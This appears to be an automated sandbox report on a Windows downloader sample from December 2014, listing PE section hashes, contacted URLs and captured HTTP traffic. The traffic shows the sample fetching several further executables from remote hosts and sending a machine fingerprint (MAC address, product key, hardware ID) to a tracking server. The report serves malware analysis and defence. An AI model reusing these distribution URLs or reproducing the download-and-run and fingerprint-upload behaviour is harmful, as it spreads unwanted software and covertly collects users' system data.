File Version: 1.0.0.0
File Description: ?????
Comments: ??????????(http://www.eyuyan.com)
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 525730 | 528384 | 5.16694 | 9669be3168afdeaa40ea92d045a9bf87 |
.rdata | 532480 | 78292 | 81920 | 3.10013 | 59a4df56cb6817d94f6644cd1766027b |
.data | 614400 | 137384 | 73728 | 4.23409 | 638d29c6b937c71b888b0b82efddfb46 |
.rsrc | 753664 | 22336 | 24576 | 3.3136 | c674065dbbb8d9d754a7080269a63dd4 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://www.ancheke.cn/ffdy_238_63518.exe | |
hxxp://na.b9.aicdn.com/fstp.exe?_upd=1419052427l238l63518.exe&_upt=6ec6a9a21419053027 | |
hxxp://t.cn/RzuoiTP | 180.149.135.224 |
hxxp://int.dpool.sina.com.cn/iplookup/iplookup.php | 180.149.136.250 |
hxxp://show.man1234.com/mmliao/MM-liao8398.exe | 122.227.42.227 |
hxxp://idc.lssen.net/yx_dts.exe | |
hxxp://opt.xdwscache.glb0.lxdns.com/Opendownloadernewxml.aspx?softlist=&lmarkid=83 | |
hxxp://opt.xdwscache.glb0.lxdns.com/temp/downloaderico/main.ico | |
hxxp://idc.lssen.net/OfficeAssist.0419.80.1123.exe | |
hxxp://opt.xdwscache.glb0.lxdns.com/DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1024*768&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-D6-C5-9B&HardDrive=00000000000000000001&CPU=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=83&Wmarkid=98&Mtype=19&tick=1419033926&flag=514178a73e7afdb04d8e5b98e483a784&status=1&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 | |
hxxp://newgameapp.37.com/controller/client.php?game_id=237&tpl_type=game1&refer=feitian_wd&uid=905848&version=3001&installtime=20141220&runcount=1&curtime=20141220020525&showlogintype=3&regtimes=1 | |
hxxp://a.clickdata.37wan.com/controller/istat.controller.php?item=8133tay6p9&platform=37wan&game_id=237&ext_1=2&ext_2=feitian_wd&ext_3=905848&ext_4=855392B634F846E395634D027DCD1AB4&ext_5=1c4e8afc5f13c9a8784201dba5a3f2e0&ext_6=2&browser_type=3001 | 113.107.101.168 |
hxxp://opt.xdwscache.glb0.lxdns.com/dts/css/client/game1.css?t=1419052484 | |
hxxp://opt.xdwscache.glb0.lxdns.com/dts/css/client/game1/main.jpg | |
hxxp://opt.xdwscache.glb0.lxdns.com/dts/css/client/game1/log.jpg | |
hxxp://c02.i05.arnic.hadns.net/yx/dts/sqft/905848/app.ini | |
hxxp://opt.xdwscache.glb0.lxdns.com/DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1024*768&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-D6-C5-9B&HardDrive=00000000000000000001&CPU=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=83&Wmarkid=98&Mtype=19&tick=1419033931&flag=64acc5378222a41d6b95b13345c5af95&status=2&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 | |
hxxp://opt.xdwscache.glb0.lxdns.com/Downloaderconfig.aspx?imgtype=9158 | |
hxxp://ui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028 | |
hxxp://1st.dl.glb0.lxdns.com/ktv/9158chat2_ktv083_98200205.exe | |
hxxp://tj.9158.com/temp/downloaderico/main.ico | 203.130.60.32 |
hxxp://idc.xn--r93a55o.cc/yx_dts.exe | 222.186.60.69 |
hxxp://img1.37wanimg.com/dts/css/client/game1/main.jpg | 203.130.61.92 |
hxxp://www.hanyueyr.com/ffdy_238_63518.exe | 42.121.253.211 |
hxxp://tj.9158.com/DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1024*768&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-D6-C5-9B&HardDrive=00000000000000000001&CPU=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=83&Wmarkid=98&Mtype=19&tick=1419033931&flag=64acc5378222a41d6b95b13345c5af95&status=2&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 | 203.130.60.32 |
hxxp://gameapp.37.com/controller/client.php?game_id=237&tpl_type=game1&refer=feitian_wd&uid=905848&version=3001&installtime=20141220&runcount=1&curtime=20141220020525&showlogintype=3&regtimes=1 | 121.201.12.94 |
hxxp://jafaye.ynhaoya.com/fstp.exe?_upd=1419052427l238l63518.exe&_upt=6ec6a9a21419053027 | 108.186.7.130 |
hxxp://idc.xn--r93a55o.cc/OfficeAssist.0419.80.1123.exe | 222.186.60.69 |
hxxp://tj.9158.com/Opendownloadernewxml.aspx?softlist=&lmarkid=83 | 203.130.60.32 |
hxxp://tj.9158.com/DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1024*768&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-D6-C5-9B&HardDrive=00000000000000000001&CPU=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=83&Wmarkid=98&Mtype=19&tick=1419033926&flag=514178a73e7afdb04d8e5b98e483a784&status=1&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 | 203.130.60.32 |
hxxp://d.wanyouxi7.com/yx/dts/sqft/905848/app.ini | 61.156.157.181 |
hxxp://img1.37wanimg.com/dts/css/client/game1/log.jpg | 203.130.61.92 |
hxxp://tj.9158.com/Downloaderconfig.aspx?imgtype=9158 | 203.130.60.32 |
hxxp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028 | 112.90.83.106 |
hxxp://img1.37wanimg.com/dts/css/client/game1.css?t=1419052484 | 203.130.61.92 |
down.cncpa.net | 222.186.129.20 |
jh.01lm.com | 171.107.186.80 |
pchome.b0.upaiyun.com | 108.186.7.129 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /Opendownloadernewxml.aspx?softlist=&lmarkid=83 HTTP/1.1
User-Agent: DownloadInstall
Host: tj.9158.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 05:14:37 GMT
Server: Microsoft-IIS/6.0
Cache-Control: No-cache
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=znruqyft4gbutpugx1o5yqem; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=gb2312
Content-Length: 899
X-Via: 1.1 td49:8 (Cdn Cache Server V2.0)
Connection: keep-alive
<?xml version="1.0" encoding="GB2312"?>..<config>...<Title>..........9158ktv</Title>...<XieyiUrl>hXXp://tj.9158.com/temp/provision/9158ktv.htm</XieyiUrl>...<AdvertUrl>http://tj.9158.com/Downloaderconfig.aspx?imgtype=9158</AdvertUrl>...<DownloadUrl>hXXp://jh.01lm.com/ktv/</DownloadUrl>...<ProExe>9158chat2_ktv0{0}_{1}.exe</ProExe>...<Icon>http://tj.9158.com/temp/downloaderico/main.ico</Icon>...<IconTips>hXXp://tj.9158.com/temp/files/IconToolTip.exe</IconTips>...<Setuptime>20</Setuptime>...<ToolIcon>9158........</ToolIcon>...<Item>9158ktv</Item>...<Mtype>19</Mtype>...<ErrorUrl>hXXp://down.cncpa.net:9000/h003/index.html</ErrorUrl>...<check>....<visible>1</visible>....<choice>1</choice>....<checkName>........</checkName>....<downUrl></downUrl>...</check>...<check>....<visible>1</visible>....<choice>1</choice>....<checkName>........</checkName>....<downUrl></downUrl>...</check>..</config>......
<<< skipped >>>
GET /temp/downloaderico/main.ico HTTP/1.1
User-Agent: DownloadInstall
Host: tj.9158.com
Cookie: ASP.NET_SessionId=znruqyft4gbutpugx1o5yqem
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 05:14:39 GMT
Cache-Control: No-cache
Content-Length: 17542
Content-Type: image/x-icon
Last-Modified: Tue, 03 Sep 2013 15:03:34 GMT
Accept-Ranges: bytes
ETag: "c2a0b8c2b6a8ce1:61cd"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Via: 1.1 zjjhdx33:8106 (Cdn Cache Server V2.0), 1.1 td48:10 (Cdn Cache Server V2.0)
Connection: keep-alive
<<< skipped >>>
GET /DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1024*768&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-D6-C5-9B&HardDrive=00000000000000000001&CPU=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=83&Wmarkid=98&Mtype=19&tick=1419033926&flag=514178a73e7afdb04d8e5b98e483a784&status=1&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 HTTP/1.1
User-Agent: DownloadInstall
Host: tj.9158.com
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=znruqyft4gbutpugx1o5yqem
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 05:14:45 GMT
Server: Microsoft-IIS/6.0
Cache-Control: No-cache
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1142
X-Via: 1.1 td49:8 (Cdn Cache Server V2.0)
Connection: keep-alive
..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>.................</title></head>..<body>.. <form name="form1" method="post" action="DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1024*768&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-D6-C5-9B&HardDrive=00000000000000000001&CPU=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=83&Wmarkid=98&Mtype=19&tick=1419033926&flag=514178a73e7afdb04d8e5b98e483a784&status=1&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9" id="form1">..<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzgzNDMwNTMzZGSnkXrJ7Bg7YIIyJXb iSnRqd8R7Q==" />..<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="05019BFC" />.. <div style="text-align:center">.. <img title="webgo".. </div>.. </form>..</body>..</html>......
<<< skipped >>>
GET /DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1024*768&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-D6-C5-9B&HardDrive=00000000000000000001&CPU=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=83&Wmarkid=98&Mtype=19&tick=1419033931&flag=64acc5378222a41d6b95b13345c5af95&status=2&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9 HTTP/1.1
User-Agent: DownloadInstall
Host: tj.9158.com
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=znruqyft4gbutpugx1o5yqem
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 05:14:51 GMT
Server: Microsoft-IIS/6.0
Cache-Control: No-cache
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1142
X-Via: 1.1 td49:8 (Cdn Cache Server V2.0)
Connection: keep-alive
..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>.................</title></head>..<body>.. <form name="form1" method="post" action="DownloadInsertinfo.aspx?Browser=iexplore(6.00.2900.5512)&Resolution=1024*768&OS=Microsoft Windows XP Professional&KEY=76487-341-6719426-22526&Mac=00-0C-29-D6-C5-9B&HardDrive=00000000000000000001&CPU=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz&Graphics=VMware SVGA II&Safe=&QQ=&Sougou=&Lmarkid=83&Wmarkid=98&Mtype=19&tick=1419033931&flag=64acc5378222a41d6b95b13345c5af95&status=2&qqnumber=&downloadtime=0&setuptime=0&downloadflag=0&v=V1.9" id="form1">..<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzgzNDMwNTMzZGSnkXrJ7Bg7YIIyJXb iSnRqd8R7Q==" />..<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="05019BFC" />.. <div style="text-align:center">.. <img title="webgo".. </div>.. </form>..</body>..</html>....
<<< skipped >>>
GET /dts/css/client/game1/log.jpg HTTP/1.1
Accept: */*
Referer: hXXp://gameapp.37.com/controller/client.php?game_id=237&tpl_type=game1&refer=feitian_wd&uid=905848&version=3001&installtime=20141220&runcount=1&curtime=20141220020525&showlogintype=3&regtimes=1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img1.37wanimg.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Expires: Fri, 09 Jan 2015 03:31:26 GMT
Date: Wed, 10 Dec 2014 03:31:26 GMT
Server: nginx/1.0.11
Content-Type: image/jpeg
Content-Length: 50696
Last-Modified: Wed, 23 Apr 2014 06:14:05 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 zjjhdx41:8104 (Cdn Cache Server V2.0), 1.1 kf48:10 (Cdn Cache Server V2.0)
Connection: keep-alive
<<< skipped >>>
GET /fstp.exe?_upd=1419052427l238l63518.exe&_upt=6ec6a9a21419053027 HTTP/1.1
Referer: hXXp://jafaye.ynhaoya.com/fstp.exe?_upd=1419052427l238l63518.exe&_upt=6ec6a9a21419053027
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jafaye.ynhaoya.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: marco/0.5
Date: Sat, 20 Dec 2014 05:13:48 GMT
Content-Type: application/octet-stream
Content-Length: 108632
Connection: keep-alive
X-Request-Id: 8879884559421a09a3cbc32ffd33f322; 320f88ff09ff646b1525c149da6c721c; 95be69e69653739102feb611ad7193c3; 3a87dfe84c736c89a24068822ded4f09
X-Source: U/200
Last-Modified: Sat, 20 Dec 2014 04:47:14 GMT
Expires: Sat, 27 Dec 2014 06:31:18 GMT
Cache-Control: max-age=611038
Accept-Ranges: bytes
Age: 1589
X-Cache: MISS|HIT from ctn-zj-hgh-098; MISS|HIT from ctn-gd-zhs-006; HIT from usn-us-vcv-130
Content-Disposition: attachment; filename=1419052427l238l63518.exe
<<< skipped >>>
GET /dts/css/client/game1.css?t=1419052484 HTTP/1.1
Accept: */*
Referer: hXXp://gameapp.37.com/controller/client.php?game_id=237&tpl_type=game1&refer=feitian_wd&uid=905848&version=3001&installtime=20141220&runcount=1&curtime=20141220020525&showlogintype=3&regtimes=1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img1.37wanimg.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 05:14:46 GMT
Server: nginx/1.4.2
Content-Type: text/css
Content-Length: 8315
Last-Modified: Sat, 13 Dec 2014 06:42:52 GMT
ETag: "548bdfec-207b"
Expires: Mon, 19 Jan 2015 05:14:47 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
X-Via: 1.1 zjjhdx32:8106 (Cdn Cache Server V2.0), 1.1 kf49:4 (Cdn Cache Server V2.0)
Connection: keep-alive
idth:606px;height:395px;overflow:hidden;color:#66554b;background:#000;}...log {background:url(game1/main.jpg) no-repeat;}...reg {background:url(game1/main.jpg) no-repeat;}...server {background:url(game1/server.jpg) no-repeat;}...history {background:url(game1/history.jpg) no-repeat;}../* log */../* kv */...kv-focus {width:221px;height:131px;overflow:hidden;position:absolute;top:4px;right:7px;}...log-kv {position:relative;width:221px;height:131px;overflow:hidden;}...log-kv img {vertical-align:bottom;width:221px;height:131px;}...log-kv-nav {position:absolute;bottom:2px;right:5px;}...log-kv-nav a {float:left;display:block;background-color:#fff;color:#000;padding:2px 8px;margin-right:5px;_display:inline;text-indent:-9999px;font-size: 0;}...log-kv-nav .focus, .log-kv-nav a:hover {background-color:#fd8800;color:#fff;text-decoration:none;}../* news */...news-tab {display:none;}...news {width:350px;height:135px;overflow:hidden;position:absolute;top:34px;left:10px;}...news li {padding:0 10px 0 16px;height:23px;border-bottom:0;line-height:24px;background:url(game1/dot.jpg) no-repeat left center;}...news li a {displ@charset "utf-8";..html, body, div, span, iframe,h1, h2, p, blockquote, pre,abbr, em, img, samp,small, strong, sub,b, i,dl, dt, dd, ul, li,..fieldset, form, label, legend,table, caption, tbody, tfoot, thead, tr, th, td,article, aside, canvas, details, figcaption, ..figure, footer, header,hgroup, menu, nav, section, summary {margin:0;padding:0;border:0;outline:0;}..a, input, button {padding:0;margin:0;outline:0;b
<<< skipped >>>
GET /dts/css/client/game1/main.jpg HTTP/1.1
Accept: */*
Referer: hXXp://gameapp.37.com/controller/client.php?game_id=237&tpl_type=game1&refer=feitian_wd&uid=905848&version=3001&installtime=20141220&runcount=1&curtime=20141220020525&showlogintype=3&regtimes=1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img1.37wanimg.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Expires: Fri, 09 Jan 2015 03:30:47 GMT
Date: Wed, 10 Dec 2014 03:30:47 GMT
Server: nginx/1.0.11
Content-Type: image/jpeg
Content-Length: 52706
Last-Modified: Thu, 05 Jun 2014 07:17:53 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 zjjhdx41:8107 (Cdn Cache Server V2.0), 1.1 kf50:8 (Cdn Cache Server V2.0)
Connection: keep-alive
<<< skipped >>>
GET /yx_dts.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: idc.xn--r93a55o.cc
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Length: 915216
Content-Type: application/octet-stream
Last-Modified: Thu, 18 Dec 2014 08:27:47 GMT
Accept-Ranges: bytes
ETag: "2c1fe2809c1ad01:5c1"
Server: Microsoft-IIS/6.0
Date: Sat, 20 Dec 2014 05:14:36 GMT
<<< skipped >>>
GET /OfficeAssist.0419.80.1123.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: idc.xn--r93a55o.cc
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Length: 3696856
Content-Type: application/octet-stream
Last-Modified: Fri, 19 Dec 2014 12:34:18 GMT
Accept-Ranges: bytes
ETag: "22d7c1b881bd01:5c1"
Server: Microsoft-IIS/6.0
Date: Sat, 20 Dec 2014 05:14:41 GMT
<<< skipped >>>
GET /RzuoiTP HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: t.cn
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Found
Location: hXXps://pchome.b0.upaiyun.com/2.ico
Content-Type: text/html;charset=UTF-8
Server: weibo
Content-Length: 217
Date: Sat, 20 Dec 2014 05:13:50 GMT
X-Varnish: 2548699336
Age: 0
Via: 1.1 varnish
Connection: keep-alive
<HTML>.<HEAD>.<TITLE>Moved Temporarily</TITLE>.</HEAD>.<BODY BGCOLOR="#FFFFFF" TEXT="#000000">.<H1>Moved Temporarily</H1>.The document has moved <A HREF="https://pchome.b0.upaiyun.com/2.ico">here</A>..</BODY>.</HTML>...
GET /controller/client.php?game_id=237&tpl_type=game1&refer=feitian_wd&uid=905848&version=3001&installtime=20141220&runcount=1&curtime=20141220020525&showlogintype=3&regtimes=1 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: gameapp.37.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 20 Dec 2014 05:14:44 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=ea0f103f76d0c56ec96c6b4448e34036; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sq_client_data=a%3A6%3A%7Bs%3A7%3A%22game_id%22%3Bs%3A3%3A%22237%22%3Bs%3A5%3A%22refer%22%3Bs%3A10%3A%22feitian_wd%22%3Bs%3A3%3A%22uid%22%3Bs%3A6%3A%22905848%22%3Bs%3A13%3A%22showlogintype%22%3Bs%3A1%3A%223%22%3Bs%3A8%3A%22tpl_type%22%3Bs%3A5%3A%22game1%22%3Bs%3A11%3A%22installtime%22%3Bs%3A8%3A%2220141220%22%3B%7D; path=/; domain=37.com
Set-Cookie: client_type=3; path=/; domain=37.com
37web: zs_12_18_web
2548..<!doctype html>.<html lang="en">.<head>. <meta charset="UTF-8" />. <title>......</title>. <link rel="stylesheet" href="hXXp://img1.37wanimg.com/dts/css/client/game1.css?t=1419052484" />.</head>.<body data-gameid="237">. <div class="container log relative">. <div class="log-form relative">. <p>. <label for="log-username">.........</label>. <input type="text" name="log-username" id="log-username" class="log-username"/><span class="status"></span>. </p>. <7.com/zt/dts/20141209/" target="_blank"><img src="hXXp://img2.37wanimg.com/2014/12/101215116dbQk.jpg" alt=""/></a>.. </div>.. <div class="log-kv-panel">.. <a href="hXXp://dts.37.com/xinwen_20141204_4739/" target="_blank"><img src="hXXp://img2.37wanimg.com/2014/12/04190114Mvpaw.jpg" alt=""/></a>.. </div>.. <div class="log-kv-panel">.. <a href="hXXp://huodong.37.com/zt/dts/20141203/" target="_blank"><img src="hXXp://img2.37wanimg.com/2014/11/19204027FVrEy.jpg" alt=""/></a>.. </div>.. <div class="log-kv-panel">.. <a href="http://dts.37.com/dq/" target="_blank"><img src="hXXp://img2.37w
<<< skipped >>>
GET /cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xui.ptlogin2.qq.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: keep-alive
Keep-Alive: timeout=50, max=1024
Server: QZHTTP-2.38.20
Date: Sat, 20 Dec 2014 05:14:50 GMT
P3P: CP="CAO PSA OUR"
Cache-Control: max-age=604800
Set-Cookie: pt_local_token=1654165040; PATH=/; DOMAIN=ptlogin2.qq.com;
Last-Modified: Mon, 15 Dec 2014 01:30:00 GMT
Content-type: text/html
Content-Length: 5305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="hXXp://VVV.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><style type="text/css">u{text-decoration:none}body{font-family:Tahoma,Verdana,Arial,......;font-size:12px;margin:0}.clear{clear:both;font-size:0;line-height:0;height:0}#login{margin:0 auto;float:none;width:320px;padding:0 0 10px 50px}.linemid{padding:10px 8px 0 30px;color:gray}.btn_select,.btn_gray{border:0;color:#2473a2;width:103px;height:28px;padding-left:2px;cursor:pointer;font-weight:bold;font-size:14px}.btn_select{background:url(hXXp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif) no-repeat -102px -130px}.btn_gray{background:url(hXXp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif) no-repeat -102px -225px}#login #list_uin img{padding:7px;background:url(hXXp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif) no-repeat 0 -329px}#list_uin li{list-style:none;padding:0 0 0 28px; padding-left:12px;width:270px;word-wrap:break-word;min-height:20px;clear:both}#list_uin li input{float:left;margin-bottom:5px;width:20px}#list_uin label{margin:2px 0 0 4px;float:left;width:220px}#login p{padding:8px 15px 12px 32px;margin:0;font-size:12px;color:#535353}.x_lowLogin{padding:10px 0 0 28px;display:none}</style><script>var g_begTime=new Date();..(function(){...window.onerror = function(msg,url,line){....var t = document.createElement('
<<< skipped >>>
GET /yx/dts/sqft/905848/app.ini HTTP/1.1
User-Agent: HTTPDownloader
Host: d.wanyouxi7.com
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 05:14:47 GMT
Content-Length: 61
Accept-Ranges: bytes
Content-Type: application/octet-stream
Last-Modified: Thu, 13 Nov 2014 07:23:49 GMT
ETag: "54645c85-3d"
X-Cache: HIT from p05.i01
X-Cache: HIT from c02.i05.
[version].currentversion=3.0.0.0.[recommend].link=.linkname=...
GET /iplookup/iplookup.php HTTP/1.0
Host: int.dpool.sina.com.cn
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Date: Sat, 20 Dec 2014 05:13:54 GMT
Server: Apache
Set-Cookie: U_TRS1=00000026.d6097b1e.54950592.07e9c9db; path=/; expires=Tue, 17-Dec-24 05:13:54 GMT; domain=.sina.com.cn
Set-Cookie: U_TRS2=00000026.d6117b1e.54950592.a16e5f72; path=/; domain=.sina.com.cn
Cache-Control: max-age=120
Expires: Sat, 20 Dec 2014 05:15:54 GMT
DPOOL_HEADER: 10.79.112.38
Content-Length: 26
Connection: close
Content-Type: text/html; charset=GBK
SINA-LB:aGEuMTA4LmczLnlmLmxiLnNpbmFub2RlLmNvbQ==
SINA-TS:ZDc5MjljY2UgMCAwIDAgNCAwCg==
1.-1.-1.....................
GET /ktv/9158chat2_ktv083_98200205.exe HTTP/1.1
Host:jh.01lm.com
Accept:*/*
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Connection:Keep-Alive
HTTP/1.0 200 OK
Date: Sat, 20 Dec 2014 05:12:45 GMT
Content-Type: application/octet-stream
ETag: "386472367"
Accept-Ranges: bytes
Last-Modified: Thu, 18 Dec 2014 07:15:44 GMT
Content-Length: 15062552
Server: WS CDN Server
Age: 126
Via: 1.0 hbjm166:80 (Cdn Cache Server V2.0), 1.0 nanning16:8101 (Cdn Cache Server V2.0)
Connection: keep-alive
<<< skipped >>>
GET /Downloaderconfig.aspx?imgtype=9158 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: tj.9158.com
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=znruqyft4gbutpugx1o5yqem
